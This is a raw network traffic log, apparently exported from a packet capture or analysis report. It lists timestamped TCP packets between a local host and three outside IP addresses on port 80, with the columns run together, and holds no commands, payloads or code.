                                                                                                                                                                                                                                        Jul 13, 2024 07:06:33.368746996 CEST8058974185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:33.368846893 CEST5897480192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:33.368908882 CEST5897480192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:33.374011993 CEST8058974185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:37.370425940 CEST5897480192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:42.389473915 CEST5897580192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:42.394687891 CEST8058975185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:42.394833088 CEST5897580192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:42.395057917 CEST5897580192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:42.401480913 CEST8058975185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:46.401567936 CEST5897580192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:51.420105934 CEST5897680192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:51.425674915 CEST8058976185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:51.425816059 CEST5897680192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:51.425934076 CEST5897680192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:51.431246996 CEST8058976185.216.214.217192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:06:55.432907104 CEST5897680192.168.2.5185.216.214.217
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:00.451294899 CEST5897380192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:00.451421976 CEST5897880192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:00.456587076 CEST805897877.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:00.456660986 CEST5897880192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:00.456748009 CEST5897880192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:00.456895113 CEST805897377.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:00.456954956 CEST5897380192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:00.461872101 CEST805897877.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.157881975 CEST805897877.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.158122063 CEST5897880192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.161791086 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.166755915 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.167016029 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.167506933 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.168003082 CEST5897880192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.172641993 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.173535109 CEST805897877.91.77.81192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.173593998 CEST5897880192.168.2.577.91.77.81
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858057976 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858108997 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858148098 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858181953 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858216047 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858236074 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858236074 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858236074 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858236074 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858248949 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858283997 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858289003 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858289003 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858316898 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858350992 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858366013 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858366013 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858387947 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.858594894 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.863636017 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.863723040 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.863929987 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.863929987 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.945415974 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.945655107 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.945718050 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.945718050 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982475996 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982546091 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982624054 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982661009 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982692957 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982696056 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982711077 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982732058 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982804060 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982804060 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982822895 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982908010 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982939959 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982973099 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.982999086 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.983160973 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.983365059 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.983416080 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.983443975 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.983449936 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.983483076 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.983483076 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.983658075 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.983658075 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984163046 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984214067 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984215021 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984249115 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984258890 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984299898 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984304905 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984337091 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984384060 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984384060 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984934092 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.984977007 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.985012054 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.985064030 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.985097885 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.985111952 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.985111952 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.985132933 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.985229015 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:01.985229015 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.076407909 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.076457024 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.076518059 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.076589108 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.076589108 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.076589108 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107237101 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107310057 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107314110 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107362986 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107372046 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107397079 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107431889 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107441902 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107441902 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107465982 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107489109 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107501030 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107533932 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107542992 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107542992 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107572079 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107614040 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.107614040 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108284950 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108319998 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108342886 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108372927 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108381033 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108406067 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108422995 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108442068 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108475924 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108494043 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.108584881 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.109253883 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.109306097 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.109312057 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.109340906 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.109375000 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.109385967 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.109411001 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.109431982 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.109445095 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.109533072 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110306978 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110358953 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110358953 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110394001 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110416889 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110426903 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110460997 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110475063 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110475063 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110496044 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110532999 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110532999 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110901117 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110949993 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110955000 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.110990047 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111053944 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111088037 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111098051 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111113071 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111125946 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111169100 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111169100 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111840963 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111892939 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111926079 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111959934 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.111989021 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112023115 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112057924 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112066031 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112066031 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112308979 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112746954 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112787962 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112798929 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112833977 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112867117 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112878084 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112878084 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.112967968 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.164870977 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.164961100 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.164995909 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.165031910 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.165066957 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.165129900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.165129900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.165129900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.165129900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.165129900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.231986046 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232029915 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232067108 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232101917 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232136965 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232172012 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232191086 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232191086 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232192039 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232192039 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232208967 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232251883 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232251883 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232309103 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232363939 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232398033 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232429981 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232464075 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232466936 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232466936 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232506037 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232567072 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232603073 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232639074 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232672930 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232697964 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232724905 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232758045 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232779980 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232779980 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232793093 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232826948 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232848883 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232848883 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.232947111 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233062983 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233129025 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233161926 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233179092 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233179092 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233278036 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233293056 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233346939 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233352900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233381033 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233475924 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233519077 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233552933 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233586073 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233597040 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233597040 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233623028 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233665943 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233665943 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233709097 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233742952 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233776093 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233788013 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233788013 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233810902 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.233817101 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.234106064 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.234430075 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.234500885 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.234538078 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.234546900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.234546900 CEST5897980192.168.2.577.232.41.110
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.234571934 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.234606981 CEST805897977.232.41.110192.168.2.5
                                                                                                                                                                                                                                        Jul 13, 2024 07:07:02.234616995 CEST5897980192.168.2.577.232.41.110
